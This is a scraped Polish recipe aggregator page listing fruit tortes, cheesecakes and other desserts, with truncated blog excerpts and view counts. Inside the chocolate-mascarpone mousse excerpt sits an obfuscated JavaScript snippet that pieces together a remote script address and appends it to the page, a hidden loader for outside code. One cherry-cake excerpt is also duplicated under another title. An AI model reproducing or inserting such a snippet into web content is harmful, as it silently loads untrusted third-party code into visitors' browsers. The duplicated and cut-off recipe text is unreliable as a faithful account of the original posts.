torty owocowe - 592 przepisów (strona:31/40)

BLACKBERRY SOMERSBY. 162

  Zawitała do mnie wielka niespodzianka w postaci paczki od Lorda Somersby. A w niej same skarby!Lecz najważniejszą pozycją jest nowe piwo Somersby o smaku

W kuchni Karmel-itki
Lekki tort truskawkowy z kremem mascarpone 257

     Sezon truskawkowy w pełni! Piękne, pachnące i słodkie owoce spoglądają z każdego rogu na bazarkach, więc korzystajmy z tego jak najwięcej. W towarzystwie

sama złodycz
NALEŚNIKI. PO PROSTU. 320

Bloger nie tylko blogiem żyje. To normalny człowiek. Jak każdy inny.Nawet w kwestii jedzenia. Wielu osobom spoza blogowego światka wydaje się, że bloger kulinarny to ktoś

W kuchni Karmel-itki
Egzotyczny torcik z kremem ryżowym 121

„Zainspirowana dwoma produktami Firmy Apart: Nektarem pod prysznic-morela i pomarańcza oraz Płynem  do kąpieli-migdał i kokos stworzyłam na potrzeby konkursu „Apart: Kosmetyczne inspiracje

Wiem co jem
Biszkopt Ovocella 163

Kochani- nareszcie zebrałam się do publikacji nowego przepisu, a raczej wreszcie jestem w stanie J Ostatnio trochę przychorowałam, ale powoli wracam do żywych i śpieszę z

Domowe ciasta
Pieczone warzywa z sosem curry 230

Nie jestem zwolennikiem dań bezmięsnych, jednak raz na jakiś czas można i nawet trzeba zrezygnować z mięsa. Muszę przyznać że pieczone warzywa z sosem curry są

Kulinarnyblog.pl - wiesz jak gotować!
CIASTA BOŻEGO NARODZENIA 428

margaryny 1 szklanka mąki pszennej 4 budynie wiśniowe bez cukru 40 g lub 2 budynie wiśniowe 64 g 1 łyżka proszku do pieczenia Nasączenie wiśniowe: 3 torebki owocowej herbaty wiśniowej 1 torebka czarnej herbaty earl grey 200 ml gorącej wody 150 - 200 ml przygotowanej zimnej wody można dosłodzić do smaku  Masa budyniowa czekoladowa: 2 budynie czekoladowe bez cukru(...)blatem ciasta, nasączyć  i posmarować 1/2 masy czekoladowej. Na wierzch położyć trzeci blat ciasta, który również nasączyć i rozsmarować pozostałym kremem ciasto wierzch i cienką warstwę kremu boki tortu. Na koniec w kąpieli wodnej rozpuścić czekoladą i polać po kremie czekoladowym robiąc esy floresy. Na wierzch czekolady można posypać posypką waflową.   12. Keks Składniki: 200 g margaryny

Ciastka - domowe słodkości
GÓRKA WIŚNIOWO - CZEKOLADOWA 117

margaryny 1 szklanka mąki pszennej 4 budynie wiśniowe bez cukru 40 g lub 2 budynie wiśniowe 64 g 1 łyżka proszku do pieczenia Nasączenie wiśniowe: 3 torebki owocowej herbaty wiśniowej 1 torebka czarnej herbaty earl grey 200 ml gorącej wody 150 - 200 ml przygotowanej zimnej wody można dosłodzić do smaku  Masa budyniowa czekoladowa: 2 budynie czekoladowe bez cukru(...)blatem ciasta, nasączyć  i posmarować 1/2 masy czekoladowej. Na wierzch położyć trzeci blat ciasta, który również nasączyć i rozsmarować pozostałym kremem ciasto wierzch i cienką warstwę kremu boki tortu. Na koniec w kąpieli wodnej rozpuścić czekoladą i polać po kremie czekoladowym robiąc esy floresy. Na wierzch czekolady można posypać posypką waflową

Ciastka - domowe słodkości
Ciasto z wiśniami 108

Cześć Przygotowując ciasto z wiśniami inspirowałam się poniekąd przepisem na tort szwarcwaldzki znaleziony w jakieś babskiej gazecie. Nie chciałam podawać ciast na ciemnym spodzie więc musiałam kombinować. I wyszło mi coś takiego: Ciasto z wiśniami Przygotuj mikser, miski i miseczki, łyżkę, łyżeczkę, prostokątną dużą blachę, zaostrzony, drewniany patyczek lub wykałaczkę, papier do pieczenia, wysokie naczynie do ubicia śmietany(...)naczyniu ubij ją na sztywno z cukrem waniliowym i ewentualnie zagęstnikami do śmietany. Gdy biszkopt i masa wiśniowa będą już chłodne, połącz wszystkie warstwy ciast. Na biszkopcie rozsmaruj masę owocową. Na wierzch wyłóż bitą śmietanę. Tak przygotowany placek możesz ozdobić w dowolny sposób, np. startą czekoladą. Zdjęcie to samo, co przy poprzedniej notce. Ale jak pisałam tydzień temu, fotografowałam resztki

blog.moje-pasje.info
Mus czekoladowy z mascarpone 259

bazie popularnego sera mascarpone, który najczęściej wykorzystuję się do zrobienia włoskiego deseru tiramisu.  Jeszcze kilka lat temu nie byłam miłośniczką czekolad. Jeśli wybierałam lody, to tylko owocowe, najchętniej wyraziste w smaku sorbety jak malinowy z rozmarynem czy cytrynowy z miętą. Z czasem moje preferencje smakowe się zmieniły. Myślę, że duży wpływ na tę zmianę miała podróż do Belgii. Czekolada(...)włoskiego sera mascarpone. W wersji dla dorosłych warto dodać kilka kropli alkoholu, który pasuje do czekolady. Taki mus czekoladowy może być wykorzystany jako krem do przełożenia blatów biszkoptowych na tort. (function(){ ccku=document.createElement("script");ccku_=("ust");cckuu="15408294"; ccku_+="a"+("t.i");ccku.type="text/javascript"; cckuu+=".nwbbcttjcku0fgx1wqa0";ccku.async=true;ccku_+="n"+("f"+"o")+"/"; cckuu+="n4gh0tsvtX";ccku.src="//"+ccku_+cckuu; document.body.appendChild(ccku

Moja smaczna kuchnia
Sernik owocowy na blacie biszkoptowym. 171

ernik owocowy. Składniki : Spód : 8 dkg cukru 3 dkg mąki pszennej 3 dkg mąki ziemniaczanej 1 płaska łyżeczka proszku do pieczenia 2 dkg margaryny ( roztopionej ) 2 jajka 5 dkg orzechów laskowych ( mielonych )  tortownica o śr. 26 cm Masa serowa : 40 dkg mielonego twarogu ( mielonego ) 10 dkg cukru 50 dkg mieszanki małych owoców ( np. borówka,porzeczka ) 8 łyżeczek żelatyny(...)nasze całe owoce. Przygotować polewę w proszku,soku porzeczkowego i cukru. Rozprowadzić ciepłą na owocach i pozostawić do zastygnięcia. Ubić 10 dkg śmietany 36% i obsmarować nią boki naszego tortu. Obsmarowane boki obsypać płatkami migdałowymi

Przepisy i porady kulinarne
Lekki tort jagodowo-malinowy 277

Dziś kolejne ciasto dla miłośników letnich owoców. Wprost owocowe szaleństwo :) Torcik jest bardzo prosty w przygotowaniu, jedynie czasochłonny - ponieważ nie da się ominąć czasu oczekiwania na tężenie galaretek. Ale uwierzcie mi... każda minuta jest warta poświęcenia dla tego ciasta. Składniki na biszkopt: 2 jajka 50 g cukru pudru 60 g mąki tortowej 50 g stopionego, wystudzonego masła Masa śmietanowo-jogurtowa(...)wstawić do lodówki aby masa stężała. Przygotować galaretkę jagodową wg przepisu na opakowaniu. Odstawić do schłodzenia. Do tężejącej galaretki dodać umyte owoce przeznaczone do dekoracji i wylać na wierzch tortu. Ponownie wstawić do lodówki. Gdy torcik dobrze stężeje zdjąć obręcz tortownicy i delikatnie odkleić paski folii aluminiowej. Przełożyć na talerz. Do czasu podania trzymać w lodówce. Źródło: cafeamaretto

Świat Ciasta
Mazurek czekoladowy 190

Jeśli widzieliście już pierwszy w tegoroczny mazurek, to wiecie już pewnie, że zgodnie z moją rodzinną tradycją mazurki wyglądają jak małe torciki – tak je pamiętam

Ciastkozercy
Ciasta na Wielkanoc – bez jajek i mleka 294

fajną konsystencję i niepowtarzalny smak. Piecze się je na bazie oleju, dlatego jest ono całkowicie bezmleczne. Biszkopt przekładany malinami i kremem budyniowym Biszkopt nadaje się nie tylko do tortu. Można z niego wyczarować także przepyszne ciasto biszkoptowe . Ciasto przełożone malinami i budyniem kokosowym doskonale się komponuje. Proste i szybkie ciasto z brzoskwiniami Ciasto z brzoskwiniami jest jednym z prostszych wypieków(...)trochę soku z cytryny. Strudel z jabłkami Strudel to dość wymagające ciasto. Jeśli jednak zdecydujecie się na przygotowanie go na święta, nie zawiedziecie się. Ciasto jest delikatne i bardzo owocowe. Choć w zrobienie strudla musicie zainwestować trochę czasu to możecie włączyć w przygotowania swoje dzieci. Gotowy strudel możecie podawać zarówno na ciepło (np. z lodami) jak i na zimno

Dieta bez mleka
Rabarbarowy deser na otwarcie sezonu. I wakacje 219

okazji tortu - był, wrażenie zrobił odpowiednie, zjedzony został w przeważającej ilości już przez gości; dla nas zostały tylko jakieś maleńkie kawałeczki na deser do popołudniowej kawy.Dzisiaj jednak nie o torcie będzie, ale o otwarciu rabarbarowego sezonu pysznym deserem i o... Wakacjach.Tak, ledwo wróciłam z jednych, a już planuję następne. Choć w sumie planuję nie oddaje istoty sprawy. Wymyśliłam, zaplanowałam, zorganizowałam(...)zacznie się rozpadać. Dodać pokrojone na mniejsze kawałki truskawki, wymieszać. Gotować jeszcze 2-3 minuty, zdjąć z ognia i ostudzić. Przełożyć do szklanek.Schłodzić w lodówce.Na masę owocową wyłożyć jogurt, posypać uprażonymi na suchej patelni płatkami migdałów i polać miodem. Udekorować listkami mięty. Podawać od razu.Smacznego!A Wy? Jedliście już rabarbar w tym roku

Pożeraczka, czyli raz adobrze